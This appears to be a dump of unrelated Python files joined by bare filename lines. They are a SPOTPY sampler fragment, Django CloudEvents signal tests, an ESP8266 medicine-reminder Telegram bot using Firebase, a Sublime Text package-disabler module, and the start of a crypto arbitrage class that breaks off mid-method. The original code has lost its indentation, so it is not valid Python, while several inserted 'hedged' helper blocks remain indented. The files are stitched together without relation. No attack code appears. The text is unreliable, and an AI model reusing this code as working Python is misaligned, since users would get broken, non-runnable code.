sim_thread = threading.Thread(target=model_layer, args=(que, params))
sim_thread.daemon = True
sim_thread.start()
# If self.sim_timeout is not None, self.model will be aborted after self.sim_timeout seconds;
# otherwise it runs as long as it needs to.
sim_thread.join(self.sim_timeout)
# If the thread delivered no result, i.e. it was cut off by the timeout, the default result is
# '[nan]'; otherwise take the result from the queue
model_result = [np.NAN]
if not que.empty():
model_result = que.get()
return id, params, model_result
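# Hedged example (not part of the original file): a minimal spot_setup sketch showing the
# interface that _algorithm expects from the user -- parameters, simulation(), evaluation()
# and objectivefunction(). All names and numbers here are illustrative assumptions, not part
# of the SPOTPY API itself.
class _DemoSetup(object):
    a = parameter.Uniform(low=0.0, high=1.0)

    def simulation(self, vector):
        # toy model: scale a fixed series by the sampled parameter
        return [vector[0] * x for x in range(10)]

    def evaluation(self):
        # "observations" the simulations are compared against
        return [0.5 * x for x in range(10)]

    def objectivefunction(self, simulation, evaluation):
        # negative RMSE, so that larger is better as _RunStatistic assumes
        return -objectivefunctions.rmse(evaluation, simulation)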
|
tests.py
|
import io
import json
from django.db.models.signals import *
from django.test import TestCase, override_settings
from django_signals_cloudevents import send_cloudevent
import os
from django_fake_model import models as f
from django.db import models
from http.server import BaseHTTPRequestHandler, HTTPServer
import socket
from threading import Thread
import requests
from cloudevents.sdk import marshaller
from cloudevents.sdk.converters import binary
from cloudevents.sdk.event import v1
ALLOWED_EVENT_TYPES = (
"django.orm.pre_init",
"django.orm.post_init",
"django.orm.pre_save",
"django.orm.post_save",
"django.orm.m2m_change",
"django.orm.pre_delete",
"django.orm.post_delete",
"django.orm.pre_migrate",
"django.orm.post_migrate",
)
class FakeSourceModel(f.FakeModel):
name = models.CharField(max_length=100)
enabled = models.BooleanField()
class MockServerRequestHandler(BaseHTTPRequestHandler):
def do_GET(self):
# Process an HTTP GET request and return a response with an HTTP 200 status.
self.send_response(requests.codes.ok)
self.end_headers()
return
def do_POST(self):
# Process an HTTP POST request and return a response with an HTTP 200 status.
content_len = int(self.headers.get('Content-Length'))
request_body = self.rfile.read(content_len)
m = marshaller.NewHTTPMarshaller([binary.NewBinaryHTTPCloudEventConverter()])
event = m.FromRequest(v1.Event(), self.headers, io.BytesIO(request_body), lambda x: json.load(x))
event_type = event.EventType()
assert event_type in ALLOWED_EVENT_TYPES
extensions = event.Extensions()
extensions["djangoapp"] = FakeSourceModel._meta.app_label
extensions["djangomodel"] = FakeSourceModel._meta.model_name
event_data = event.Data()
if event_type in ("django.orm.post_init", "django.orm.pre_save", "django.orm.post_save",
"django.orm.pre_delete", "django.orm.post_delete", "django.orm.m2m_change"):
assert "data" in event_data
instance_data = event_data["data"]
assert "id" in instance_data and "name" in instance_data and "enabled" in instance_data
assert event_data["db_table"] == FakeSourceModel._meta.db_table
check_expected_kwargs(event_type, event_data["signal_kwargs"])
self.send_response(requests.codes.ok)
self.end_headers()
return
def check_expected_kwargs(event_type, kwargs):
if event_type == "django.orm.pre_init":
assert len(kwargs) == 2 and all(k in kwargs for k in ("args", "kwargs"))
elif event_type == "django.orm.post_init":
assert len(kwargs) == 0
elif event_type == "django.orm.pre_save":
assert len(kwargs) == 3 and all(k in kwargs for k in ("update_fields", "raw", "using"))
elif event_type == "django.orm.post_save":
assert len(kwargs) == 4 and all(k in kwargs for k in ("created", "update_fields", "raw", "using"))
elif event_type in ("django.orm.pre_delete", "django.orm.post_delete"):
assert len(kwargs) == 1 and "using" in kwargs
elif event_type == "django.orm.m2m_change":
assert len(kwargs) == 5 and all(k in kwargs for k in ("action", "reverse", "model", "pk_set", "using"))
elif event_type in ("django.orm.pre_migrate", "django.orm.post_migrate"):
assert len(kwargs) == 6 and all(k in kwargs for k in ("app_config", "verbosity", "interactive", "using",
"apps", "plan"))
def get_free_port():
s = socket.socket(socket.AF_INET, type=socket.SOCK_STREAM)
s.bind(('localhost', 0))
address, port = s.getsockname()
s.close()
return port
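# Hedged helper (not part of the original tests): the mock-server pattern used by
# SourceTestCase below, shown standalone. Handy when poking at MockServerRequestHandler
# outside the Django test runner; the GET round-trip is illustrative only.
def _demo_mock_server_roundtrip():
    port = get_free_port()
    server = HTTPServer(('localhost', port), MockServerRequestHandler)
    Thread(target=server.serve_forever, daemon=True).start()
    response = requests.get('http://localhost:%s' % port)
    server.shutdown()
    return response.status_code == requests.codes.ok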
@override_settings(
CLOUDEVENTS_ENV={
"SINK_VAR": "MOCK_SINK",
"SOURCE_VAR": "TEST_SOURCE"
}
)
class SourceTestCase(TestCase):
def setUp(self):
self.mock_server_port = get_free_port()
self.mock_server = HTTPServer(('localhost', self.mock_server_port), MockServerRequestHandler)
self.mock_server_thread = Thread(target=self.mock_server.serve_forever)
self.mock_server_thread.setDaemon(True)
self.mock_server_thread.start()
os.environ["MOCK_SINK"] = "http://localhost:%s" % self.mock_server_port
os.environ["TEST_SOURCE"] = "test-orm-source"
pre_init.connect(send_cloudevent, sender=FakeSourceModel)
post_init.connect(send_cloudevent, sender=FakeSourceModel)
pre_save.connect(send_cloudevent, sender=FakeSourceModel)
post_save.connect(send_cloudevent, sender=FakeSourceModel)
pre_delete.connect(send_cloudevent, sender=FakeSourceModel)
post_delete.connect(send_cloudevent, sender=FakeSourceModel)
@FakeSourceModel.fake_me
def test_send_event(self):
fake_source = FakeSourceModel.objects.create(name="fake_source", enabled=True)
fake_source.enabled = False
fake_source.save()
fake_source.delete()
|
esp8266.py
|
import pyrebase, json, threading, telegram, os, time
from telegram.ext.updater import Updater
from telegram.update import Update
from telegram.ext.callbackcontext import CallbackContext
from telegram.ext.commandhandler import CommandHandler
from telegram.ext.messagehandler import MessageHandler
from telegram.ext.filters import Filters
from datetime import datetime, timedelta
from zoneinfo import ZoneInfo
from dotenv import load_dotenv
load_dotenv()
apiKey = os.getenv('apiKey')
authDomain = os.getenv('authDomain')
databaseURL = os.getenv('databaseURL')
storageBucket = os.getenv('storageBucket')
TOKEN = os.getenv('TOKEN')
userId = os.getenv('userId')
updater = Updater(TOKEN, use_context=True)
pirMotionCount = 0
firebaseConfig = {
"apiKey": apiKey,
"authDomain": authDomain,
"databaseURL": databaseURL,
"storageBucket": storageBucket,
}
print('Started telegram bot successfully at ' + str(datetime.now()))
telegramBot = telegram.Bot(token = TOKEN)
def indexKeyHelp(update: Update, context: CallbackContext):
update.message.reply_text("""currentDate keys :-
* 0 morningStatus
* 1 afternoonStatus
* 2 nightStatus
* 3 morningTelegramAlert
* 4 afternoonTelegramAlert
* 5 nightTelegramAlert
* 6 morningStatusT
* 7 afternoonStatusT
* 8 nightStatusT
*
* timings keys
* 0 morningTabletAlertH
* 1 morningTabletAlertM
* 2 afternoonTabletAlertH
* 3 afternoonTabletAlertM
* 4 nightTabletAlertH
* 5 nightTabletAlertM
* 6 morningTiffinAlertH
* 7 morningTiffinAlertM
* 8 afternoonLunchAlertH
* 9 afternoonLunchAlertM
* 10 nightDinnerAlertH
* 11 nightDinnerAlertM""")
def sendToTelegram(message):
telegramBot.send_message(chat_id = userId, text = message)
def start(update: Update, context: CallbackContext):
update.message.reply_text(
"Hello, welcome to the Food and Medicine Reminder using ESP8266 Telegram Bot. "
"Please write /help to see the available commands.")
def help(update: Update, context: CallbackContext):
update.message.reply_text("""Available Commands :-
/showLog - shows log data of that particular day
/update - updates timings with key and value provided
/index - shows the index assigned for currentdate and timings""")
def unknown_text(update: Update, context: CallbackContext):
update.message.reply_text(
"Sorry I can't recognize you , you said '%s'" % update.message.text)
def showLog(update: Update, context: CallbackContext) :
date = ' '.join(update.message.text.split(' ',1)[1:])
if date.strip():
log = db.child(date).get().val()
if(log != None):
update.message.reply_text(json.dumps(log, indent=4))
else:
update.message.reply_text("Invalid date entered or entered date not registered in firebase, Try again with format '7 December 2021'")
else:
update.message.reply_text("No date entered, Try again with format '7 December 2021'")
def pirLog(update: Update, context: CallbackContext) :
date = ' '.join(update.message.text.split(' ',1)[1:])
if date.strip():
log = db.child("pirStatus").child(date).get().val()
if(log != None):
update.message.reply_text(json.dumps(log, indent=4))
else:
update.message.reply_text("Invalid date entered or entered date not registered in firebase, Try again with format '7 December 2021'")
else:
update.message.reply_text("No date entered, Try again with format '7 December 2021'")
def updatetimings(update: Update, context: CallbackContext):
lst = update.message.text.split(' ')[1:]
if(len(lst) % 2 == 0):
for i in range(0, len(lst), 2):
db.child('timings').update({lst[i] : int(lst[i + 1])})
update.message.reply_text("Updated index " + lst[i] + " with " + lst[i+1] + " successfully")
else:
update.message.reply_text("Passed arguments are not sufficient, try again!")
def unknown(update, context):
user = str(update.effective_chat.id)
if user == userId:
context.bot.send_message(chat_id = user, text="Sorry, I didn't understand that command.")
else:
context.bot.send_message(chat_id = user, text="Hey! This bot is not for you")
firebase = pyrebase.initialize_app(firebaseConfig)
db = firebase.database()
def telegramBotInit():
updater.dispatcher.add_handler(CommandHandler('start', start, filters = Filters.user(user_id = int(userId))))
updater.dispatcher.add_handler(CommandHandler('showlog', showLog, filters = Filters.user(user_id = int(userId))))
updater.dispatcher.add_handler(CommandHandler('update', updatetimings, filters = Filters.user(user_id = int(userId))))
updater.dispatcher.add_handler(CommandHandler('pirlog', pirLog, filters = Filters.user(user_id = int(userId))))
updater.dispatcher.add_handler(CommandHandler('index', indexKeyHelp, filters = Filters.user(user_id = int(userId))))
updater.dispatcher.add_handler(MessageHandler(Filters.text, unknown))
updater.dispatcher.add_handler(MessageHandler(Filters.command, unknown)) # Filters out unknown commands
updater.dispatcher.add_handler(MessageHandler(Filters.text, unknown_text))
updater.start_polling()
def deviceOffline(startTime):
OfflineStatus = db.child("Offline").get().val()
if(not OfflineStatus == 1): # if device is not offline
deviceTime = db.child("time").get().val() # checking device time
if(OfflineStatus == 2): # device just started
sendToTelegram('Device online at ' + startTime)
db.child().update({"Offline" : 0})
H1, M1, S1 = map(int, deviceTime.split(":"))
timeDiff = datetime.now() - timedelta(hours = H1, minutes = M1, seconds = S1)
S = int(str(timeDiff).split()[1].split(':')[-2].split('.')[0])
H, M = map(int, str(timeDiff).split()[1].split(':')[:2])
t = timedelta(hours = H, minutes = M, seconds = S)
print(datetime.now(), H, M, S, t, t.total_seconds())
minutes = t.total_seconds() / 60
if(minutes >= 2 and minutes <= 10):
sendToTelegram("Device offline, Please check and connect ASAP\n Last seen at " + deviceTime)
db.child().update({"Offline" : 1})
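# Hedged sketch (illustrative only, not used by the code above): the elapsed-time check in
# deviceOffline() can also be done directly on datetime objects, without slicing the string
# form of timeDiff. The helper name is an assumption for this example.
def minutesSinceDeviceTime(deviceTime):
    H1, M1, S1 = map(int, deviceTime.split(":"))
    now = datetime.now()
    last_seen = now.replace(hour=H1, minute=M1, second=S1, microsecond=0)
    return (now - last_seen).total_seconds() / 60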
def motionDetection(date):
tempPirCount = db.child("tempPirCount").get().val()
deviceTime = db.child("time").get().val()
#time = str(datetime.now()).split()[1][:5]
h = int(deviceTime.split(':')[0])
count = db.child("pirStatus").child(date).child(h).get().val()
if(count == 0):
tempPirCount = 0
tempPirCount += 1
db.child("pirStatus").child(date).update({h : tempPirCount})
db.child().update({"tempPirCount" : tempPirCount})
def getDay(s):
return int(s.split()[0])
def getMonth(s):
return s.split()[1]
def getNextDate(date):
months = ["January", "February", "March", "April", "May", "June", "July", "August", "September", "October", "November", "December"]
m = months.index(date.split()[1])
nextD = str(datetime(int(date.split()[-1]), m + 1, int(date.split()[0])) + timedelta(days = 1))
nexty = nextD.split()[0].split('-')[0]
nextm = nextD.split()[0].split('-')[1]
nextd = nextD.split()[0].split('-')[2]
return nextd + ' ' + months[int(nextm) - 1] + ' ' + nexty
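# Hedged alternative (illustrative only, not called anywhere): the same "next date"
# computation via strptime/strftime, avoiding the manual month list. It returns the same
# zero-padded form as getNextDate above (e.g. '08 December 2021').
def getNextDateAlt(date):
    nextDay = datetime.strptime(date, "%d %B %Y") + timedelta(days=1)
    return nextDay.strftime("%d %B %Y")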
def checkStatus():
while(True):
timeNow = str(datetime.now()).split()[1][:5]
H = int(timeNow.split(":")[0])
M = int(timeNow.split(":")[1])
pirst = db.child("pirTstatus").get().val()
if(H == 7):
if(pirst == -1):
log = db.child("pirStatus").child(date).get().val()
if(log != None):
sendToTelegram(str(json.dumps(log, indent=4)))
db.update({"pirTstatus": 1})
else:
db.update({"pirTstatus": -1})
SOS = db.child("SOS").get().val()
pirStatus = db.child("PIR").get().val()
startTime = db.child("startTime").get().val()
firebaseStatusInNode = db.child("status").get().val()
status = db.child("time").get().val()
currentTime = str(datetime.now()).split()[-1][:5]
date = db.child("date").get().val()
morningTelegramAlert = db.child(date).child(3).get().val()
afternoonTelegramAlert = db.child(date).child(4).get().val()
nightTelegramAlert = db.child(date).child(5).get().val()
firebaseKeys = db.child().get()
dict_keys = list(firebaseKeys.val().keys())
if(H == 0 and (M >= 0 and M <= 5)):
db.child("pirStatus").update({getNextDate(date) : [0] * 24})
for key in dict_keys:
if(len(key.split()[-1]) == 4 and len(key.split()) == 3):
currentDay = getDay(date)
currentMonth = getMonth(date)
keyDate = getDay(key)
keyMonth = getMonth(key)
if(currentDay - keyDate >= 3 and currentMonth == keyMonth):
db.child(key).remove()
elif (currentMonth != keyMonth and currentDay >= 3):
db.child(key).remove()
pirStatusKeys = db.child("pirStatus").get()
dict_keys = list(pirStatusKeys.val().keys())
for key in dict_keys:
if(len(key.split()[-1]) == 4 and len(key.split()) == 3):
currentDay = getDay(date)
currentMonth = getMonth(date)
keyDate = getDay(key)
keyMonth = getMonth(key)
if(currentDay - keyDate >= 3 and currentMonth == keyMonth):
db.child("pirStatus").child(key).remove()
elif (currentMonth != keyMonth and currentDay >= 3):
db.child("pirStatus").child(key).remove()
deviceOffline(startTime)
if(pirStatus):
motionDetection(date)
db.update({"PIR": False})
if(firebaseStatusInNode == 404):
sendToTelegram("Firebase error in NodeMCU")
db.update({"status": 0})
if(SOS):
sendToTelegram("Got an SOS alert from Food and Medicine Remainder using ESP8266")
db.update({"SOS": False})
if(morningTelegramAlert == 2):
sendToTelegram("Missed morning tablets")
db.child(date).update({3 : -1})
if(afternoonTelegramAlert == 2):
sendToTelegram("Missed afternoon tablets")
db.child(date).update({4 : -1})
if(nightTelegramAlert == 2):
sendToTelegram("Missed night tablets")
db.child(date).update({5 : -1})
if(morningTelegramAlert == 1):
t = db.child(date).child(6).get().val()
sendToTelegram("Took morning tablets at " + t)
db.child(date).update({3 : -1})
if(afternoonTelegramAlert == 1):
t = db.child(date).child(7).get().val()
sendToTelegram("Took afternoon tablets at " + t)
db.child(date).update({4 : -1})
if(nightTelegramAlert == 1):
t = db.child(date).child(8).get().val()
sendToTelegram("Took night tablets at " + t)
db.child(date).update({5 : -1})
time.sleep(5)
if __name__ == '__main__':
try:
t1 = threading.Thread(target = checkStatus)
t1.start()
except Exception as e:
print(str(e))
telegramBotInit()
|
package_disabler.py
|
import json
import threading
import sublime
import os
import time
import random
from . import text
from . import settings as g_settings
from .console_write import console_write
from .package_io import package_file_exists, read_package_file
from .settings import preferences_filename, pc_settings_filename, load_list_setting, save_list_setting
# This has to be imported this way for consistency with the public API,
# otherwise this code and packages will each load a different instance of the
# module, and the event tracking won't work. However, upon initial install,
# when running ST3, the module will not yet be imported, and the cwd will not
# be Packages/PackagesManager/ so we need to patch it into sys.modules.
try:
from package_control import events
except (ImportError):
events = None
class PackageDisabler():
old_color_scheme_package = None
old_color_scheme = None
old_theme_package = None
old_theme = None
old_syntaxes = {}
old_color_schemes = {}
def __init__(self):
self.pc_settings = sublime.load_settings(pc_settings_filename())
self.debug = self.pc_settings.get('debug')
# self.debug = True
def get_version(self, package):
"""
Gets the current version of a package
:param package:
The name of the package
:return:
The string version
"""
if package_file_exists(package, 'package-metadata.json'):
metadata_json = read_package_file(package, 'package-metadata.json')
if metadata_json:
try:
return json.loads(metadata_json).get('version', 'unknown version')
except (ValueError):
pass
return 'unknown version'
def disable_packages(self, packages, operation_type='upgrade'):
"""
Disables one or more packages before installing or upgrading to prevent
errors where Sublime Text tries to read files that no longer exist, or
read a half-written file.
:param packages:
The string package name, or an array of strings
:param operation_type:
The type of operation that caused the package to be disabled:
- "upgrade"
- "remove"
- "install"
- "disable"
- "loader"
:return:
A list of package names that were disabled
"""
if self.debug: console_write(u'Calling disable_packages() with: %s, type: %s', (packages, operation_type))
_operation_type = ( lambda package_name: operation_type ) if not hasattr( operation_type, "__call__" ) else operation_type
if not packages:
console_write( u'No packages to process by disable_packages!' )
return []
if not isinstance(threading.current_thread(), threading._MainThread):
raise RuntimeError('disable_packages called on a background thread')
global events
try:
from PackagesManager.package_control import events
except (ImportError):
events = None
console_write( u'Warning: could not import package events; any scheduled events will not run!' )
if not isinstance(packages, list):
packages = [packages]
in_process = []
settings = sublime.load_settings(preferences_filename())
PackageDisabler.old_color_scheme_package = None
PackageDisabler.old_color_scheme = None
PackageDisabler.old_theme_package = None
PackageDisabler.old_theme = None
for package in packages:
operation = _operation_type(package)
if events and operation in ['upgrade', 'remove']:
version = self.get_version(package)
tracker_type = 'pre_upgrade' if operation == 'upgrade' else operation
events.add(tracker_type, package, version)
global_color_scheme = settings.get('color_scheme')
if global_color_scheme is not None and global_color_scheme.find('Packages/' + package + '/') != -1:
PackageDisabler.old_color_scheme_package = package
PackageDisabler.old_color_scheme = global_color_scheme
settings.set('color_scheme', 'Packages/Color Scheme - Default/Monokai.tmTheme')
for window in sublime.windows():
for view in window.views():
view_settings = view.settings()
syntax = view_settings.get('syntax')
if syntax is not None and syntax.find('Packages/' + package + '/') != -1:
if package not in PackageDisabler.old_syntaxes:
PackageDisabler.old_syntaxes[package] = []
PackageDisabler.old_syntaxes[package].append([view, syntax])
view_settings.set('syntax', 'Packages/Text/Plain text.tmLanguage')
# Handle view-specific color_scheme settings not already taken care
# of by resetting the global color_scheme above
scheme = view_settings.get('color_scheme')
if scheme is not None and scheme != global_color_scheme \
and scheme.find('Packages/' + package + '/') != -1:
if package not in PackageDisabler.old_color_schemes:
PackageDisabler.old_color_schemes[package] = []
PackageDisabler.old_color_schemes[package].append([view, scheme])
view_settings.set('color_scheme', 'Packages/Color Scheme - Default/Monokai.tmTheme')
# Change the theme before disabling the package containing it
if package_file_exists(package, settings.get('theme')):
PackageDisabler.old_theme_package = package
PackageDisabler.old_theme = settings.get('theme')
settings.set('theme', 'Default.sublime-theme')
# We don't mark a package as in-process when disabling it, otherwise
# it automatically gets re-enabled the next time Sublime Text starts
if operation != 'disable':
in_process.append( package )
# Force Sublime Text to understand the package is to be ignored
self._force_setting( self._force_add, 'in_process_packages', in_process, g_settings.packagesmanager_setting_path() )
disabled_packages = []
to_disable = list( packages )
while len( to_disable ) > 0:
MAXIMUM_TO_REENABLE = 10
effectively_added = self._force_setting( self._force_add, 'ignored_packages', to_disable[:MAXIMUM_TO_REENABLE] )
disabled_packages.extend( effectively_added )
to_disable = to_disable[MAXIMUM_TO_REENABLE:]
return disabled_packages
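# Hedged usage sketch (not part of the original code): a caller on the main thread would
# typically pair this method with reenable_package() below, e.g.
#   disabler = PackageDisabler()
#   disabled = disabler.disable_packages(['Some Package'], 'upgrade')
#   ... perform the upgrade ...
#   disabler.reenable_package(disabled, 'upgrade')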
def reenable_package(self, packages, operation_type='upgrade'):
"""
Re-enables a package(s) after it has been installed or upgraded
:param packages:
The string package name, or a list of package names
:param operation_type:
The type of operation that caused the packages to be re-enabled:
- "upgrade"
- "remove"
- "install"
- "enable"
- "loader"
"""
if self.debug: console_write(u'Calling reenable_package() with: %s, type: %s', (packages, operation_type))
if isinstance( packages, str ): packages = [packages]
_operation_type = ( lambda package_name: operation_type ) if not hasattr( operation_type, "__call__" ) else operation_type
if not packages:
console_write( u'No packages to process by reenable_package!' )
return
if not isinstance(threading.current_thread(), threading._MainThread):
raise RuntimeError('reenable_package called on a background thread')
global events
try:
from PackagesManager.package_control import events
except (ImportError):
events = None
console_write( u'Warning: could not import package events; any scheduled events will not run!' )
settings = sublime.load_settings(preferences_filename())
ignored = load_list_setting(settings, 'ignored_packages')
if events:
for package in packages:
operation = _operation_type( package )
if package in ignored:
if operation in ['install', 'upgrade']:
version = self.get_version(package)
tracker_type = 'post_upgrade' if operation == 'upgrade' else operation
events.add(tracker_type, package, version)
events.clear(tracker_type, package, future=True)
if operation == 'upgrade':
events.clear('pre_upgrade', package)
elif operation == 'remove':
events.clear('remove', package)
# Force Sublime Text to understand the package is to be unignored
to_enable = list( packages )
while len( to_enable ) > 0:
MAXIMUM_TO_REENABLE = 10
self._force_setting( self._force_remove, 'ignored_packages', to_enable[:MAXIMUM_TO_REENABLE] )
to_enable = to_enable[MAXIMUM_TO_REENABLE:]
for package in packages:
operation = _operation_type( package )
if self.debug: console_write( u'operation: %s, _operation_type: %s', (operation, _operation_type) )
if package in ignored:
corruption_notice = u' You may see some graphical corruption until you restart Sublime Text.'
if operation == 'remove' and PackageDisabler.old_theme_package == package:
message = text.format(u'''
PackagesManager
The package containing your active theme was just removed
and the Default theme was enabled in its place.
''')
if int(sublime.version()) < 3106:
message += corruption_notice
sublime.message_dialog(message)
# By delaying the restore, we give Sublime Text some time to
# re-enable the package, making errors less likely
def delayed_settings_restore():
syntax_errors = set()
color_scheme_errors = set()
if PackageDisabler.old_syntaxes is None:
PackageDisabler.old_syntaxes = {}
if PackageDisabler.old_color_schemes is None:
PackageDisabler.old_color_schemes = {}
if operation == 'upgrade' and package in PackageDisabler.old_syntaxes:
for view_syntax in PackageDisabler.old_syntaxes[package]:
view, syntax = view_syntax
if resource_exists(syntax):
view.settings().set('syntax', syntax)
elif syntax not in syntax_errors:
console_write(u'The syntax "%s" no longer exists' % syntax)
syntax_errors.add(syntax)
if self.debug: console_write( "PackageDisabler.old_color_scheme_package: %s, \n"
"PackageDisabler.old_theme_package: %s, \n"
"PackageDisabler.old_color_schemes: %s, \n"
"package: %s",
(PackageDisabler.old_color_scheme_package,
PackageDisabler.old_theme_package,
PackageDisabler.old_color_schemes,
package) )
if operation == 'upgrade' and PackageDisabler.old_color_scheme_package == package:
if resource_exists(PackageDisabler.old_color_scheme):
settings.set('color_scheme', PackageDisabler.old_color_scheme)
else:
color_scheme_errors.add(PackageDisabler.old_color_scheme)
sublime.error_message(text.format(
u'''
PackagesManager
The package containing your active color scheme was
just upgraded, however the .tmTheme file no longer
exists. Sublime Text has been configured to use the
default color scheme instead.
'''
))
if operation == 'upgrade' and package in PackageDisabler.old_color_schemes:
for view_scheme in PackageDisabler.old_color_schemes[package]:
view, scheme = view_scheme
if resource_exists(scheme):
view.settings().set('color_scheme', scheme)
elif scheme not in color_scheme_errors:
console_write(u'The color scheme "%s" no longer exists' % scheme)
color_scheme_errors.add(scheme)
if operation == 'upgrade' and PackageDisabler.old_theme_package == package:
if package_file_exists(package, PackageDisabler.old_theme):
settings.set('theme', PackageDisabler.old_theme)
message = text.format(u'''
PackagesManager
The package containing your active theme was just
upgraded.
''')
if int(sublime.version()) < 3106:
message += corruption_notice
sublime.message_dialog(message)
else:
sublime.error_message(text.format(
u'''
PackagesManager
The package containing your active theme was just
upgraded, however the .sublime-theme file no longer
exists. Sublime Text has been configured to use the
default theme instead.
'''
))
sublime.save_settings(preferences_filename())
sublime.set_timeout(delayed_settings_restore, 1000)
threading.Thread(target=self._delayed_in_progress_removal, args=(packages,)).start()
def _delayed_in_progress_removal(self, packages):
sleep_delay = 5 + random.randint( 0, 10 )
packages = list( packages )
to_remove = []
console_write( "After %s seconds sleep, it will finish the packages changes: %s", ( sleep_delay, packages ) )
time.sleep( sleep_delay )
settings = sublime.load_settings( preferences_filename() )
ignored = load_list_setting( settings, 'ignored_packages' )
for package in packages:
if package in ignored:
console_write( "The package %s should not be in your User ignored_packages "
"package settings, after %d seconds.", ( package, sleep_delay ) )
else:
to_remove.append( package )
console_write( "After randomly %s seconds delay, finishing the packages changes: %s", ( sleep_delay, to_remove ) )
self._force_setting( self._force_remove, 'in_process_packages', to_remove, g_settings.packagesmanager_setting_path() )
def _force_setting(self, callback, *args, **kwargs):
return callback(*args, **kwargs)
def _force_add(self, setting_name, packages_to_add, full_setting_path=None):
"""
Keeps re-applying the setting because something keeps reverting it. Flushes just a few
items each time, letting the packages be unloaded by Sublime Text while ensuring nothing
puts them back in.
Randomly reverting back the `ignored_packages` setting on batch operations
https://github.com/SublimeTextIssues/Core/issues/2132
"""
if not full_setting_path: full_setting_path = g_settings.sublime_setting_path()
packages_to_add.sort()
currently_ignored = g_settings.get_list_setting(setting_name, full_setting_path)
effectively_added = [package_name for package_name in packages_to_add if package_name not in currently_ignored]
if self.debug: console_write( "_force_rem, full_setting_path: %s", ( full_setting_path ) )
if self.debug: console_write( "_force_add, currently add packages: %s", ( currently_ignored ) )
if self.debug: console_write( "_force_add, adding the packages: %s", ( packages_to_add ) )
if self.debug: console_write( "_force_add, effectively added: %s", ( effectively_added ) )
g_settings.unique_list_append( currently_ignored, packages_to_add )
currently_ignored.sort()
console_write( "Processing %s add for the packages: %s", ( setting_name, effectively_added ) )
g_settings.set_list_setting( setting_name, currently_ignored, full_setting_path )
return effectively_added
def _force_remove(self, setting_name, packages_to_remove, full_setting_path=None):
"""
Keeps re-applying the setting because something keeps reverting it. Flushes just a few
items each time, letting the packages be unloaded by Sublime Text while ensuring nothing
puts them back in.
Randomly reverting back the `ignored_packages` setting on batch operations
https://github.com/SublimeTextIssues/Core/issues/2132
"""
if not full_setting_path: full_setting_path = g_settings.sublime_setting_path()
packages_to_remove.sort()
currently_ignored = g_settings.get_list_setting(setting_name, full_setting_path)
effectively_removed = [package_name for package_name in packages_to_remove if package_name in currently_ignored]
if self.debug: console_write( "_force_rem, full_setting_path: %s", ( full_setting_path ) )
if self.debug: console_write( "_force_rem, currently present packages: %s", ( currently_ignored ) )
if self.debug: console_write( "_force_rem, removing the packages: %s", ( packages_to_remove ) )
if self.debug: console_write( "_force_rem, effectively removed: %s", ( effectively_removed ) )
currently_ignored.sort()
currently_ignored = [package_name for package_name in currently_ignored if package_name not in packages_to_remove]
console_write( "Processing %s remove for the packages: %s", ( setting_name, effectively_removed ) )
g_settings.set_list_setting( setting_name, currently_ignored, full_setting_path )
return effectively_removed
def resource_exists(path):
"""
Checks to see if a file exists
:param path:
A unicode string of a resource path, e.g. Packages/Package Name/resource_name.ext
:return:
A bool indicating whether the resource exists
"""
if not path.startswith('Packages/'):
return False
parts = path[9:].split('/', 1)
if len(parts) != 2:
return False
package_name, relative_path = parts
return package_file_exists(package_name, relative_path)
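# Illustrative sketch (not part of the original file): the disable/reenable code
# above flushes the `ignored_packages` setting in batches of 10 because Sublime
# Text can randomly revert large setting writes (Core issue #2132). The helper
# below shows the same batching pattern in isolation; `apply_batch` is a
# hypothetical stand-in for the `_force_setting(_force_add, ...)` call.
def _example_batched_setting_update(package_names, apply_batch, batch_size=10):
    """Apply `apply_batch` to `package_names` in chunks of `batch_size` items."""
    processed = []
    remaining = list(package_names)
    while remaining:
        # only a small slice is written per iteration, mirroring the MAXIMUM_TO_* constants above
        processed.extend(apply_batch(remaining[:batch_size]))
        remaining = remaining[batch_size:]
    return processed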
|
algo_multilateral_arbitrage.py
|
#!/usr/bin/python3
# -*- coding: utf-8 -*-
"""
General notation is formed as bid-ask:
the first exchange is the bid side (sell side) and the second is the ask side (buy side).
"""
import os
import datetime
import uuid
import threading
import yaml
import numpy as np
import psycopg2
from multiprocessing.pool import ThreadPool
from typing import Dict, List, Tuple, Union
from prometheus_client import Summary
import quant_sdk as sdk
import src.helpers
import src.sql_queries
import src.buildblocks
from src import util
from src.data_types import Signal
from src.trading_algorithm import TradingAlgorithm
from src.algorithm_exception import IncorrectStateException
from src.order_status.order_status import OrderStatus, timeout_tag, order_sdk_tag, additional_info_tag
ORDER_RESPONSE_TIMES = Summary('execute_order_func_times', 'Time it takes to place both legs of an arbitrage trade.')
# TODO rename algorithm files to reference their content, e.g. arbitrage_algorithm.py
# This will make log tracebacks easier to follow
class ArbitrageInstance(TradingAlgorithm):
"""
Arbitrage instance
In simulation mode the instance will not place or send any trades;
everything else will be instantiated and will run as normal.
configs_file is a yaml file located in the working directory, or anywhere when a file path is given.
"""
fee_map: Dict[str, float] = {}  # contains the fees for all exchanges
exchanges: List[str]
currencies: List[str]
# todo generate from a default global threshold
# todo be able to modify specific combinations
threshold_map: Dict[str, Dict[str, float]] = {}
# every exchange has a designated threshold for every possible combination
# format: {ex_1: {ex_2: thresh_1, ..., ex_n: thresh_n}, ...,
#          ex_n: {ex_1: thresh_1, ..., ex_(n-1): thresh_(n-1)}}
lot_size: float
min_lot_size: float
base: str
quote: str
precision: float
fund_update_lock_period: float
slippage_buffer_bps: float
fund_buffer: float
funds: Dict[str, Dict[str, float]]
def __init__(
self,
algo_name,
client=None,
logger_wrapper: src.util.LoggerWrapper=None,
visualization=False,
update_order_sleep=10
):
super().__init__(
algo_name=algo_name,
client=client,
mode=src.helpers.DBMode.TEST,
open_db_connection=False,
logger_wrapper=logger_wrapper
)
self.visualization = visualization
self.logger_wrapper.logger.info("Constructor")
self.orders_observer = OrderStatus(
client=self.client,
mode=self.mode,
test=True,
logger_instance=self.logger_wrapper,
update_order_sleep=update_order_sleep
)
self.orders_observer_thread = threading.Thread(target=self.orders_observer.resolve_orders_threaded, args=())
self.orders_observer_thread.start()
def __del__(self):
# virtual destructor
self.orders_observer.disable_activity()
self.orders_observer_thread.join()
if self.orders_observer_thread.is_alive():
self.logger_wrapper.logger.error(f"Service open orders service thread failed to stop")
else:
del self.orders_observer
super(ArbitrageInstance, self).__del__()
def trade_algorithm(self):
for currency_pair in self.configuration["CURRENCY_PAIRS"]:
basic_points_for_currency = 10000 # this comes from db table
precision = 2 # this comes from db table
exchanges_associated_to_pair = self.currency_pair_exchange_association[currency_pair['symbol']]
order_books_raw = self.client.get_order_book(exchanges_associated_to_pair, currency_pair['code_base'], currency_pair["code_quote"], depth=50)
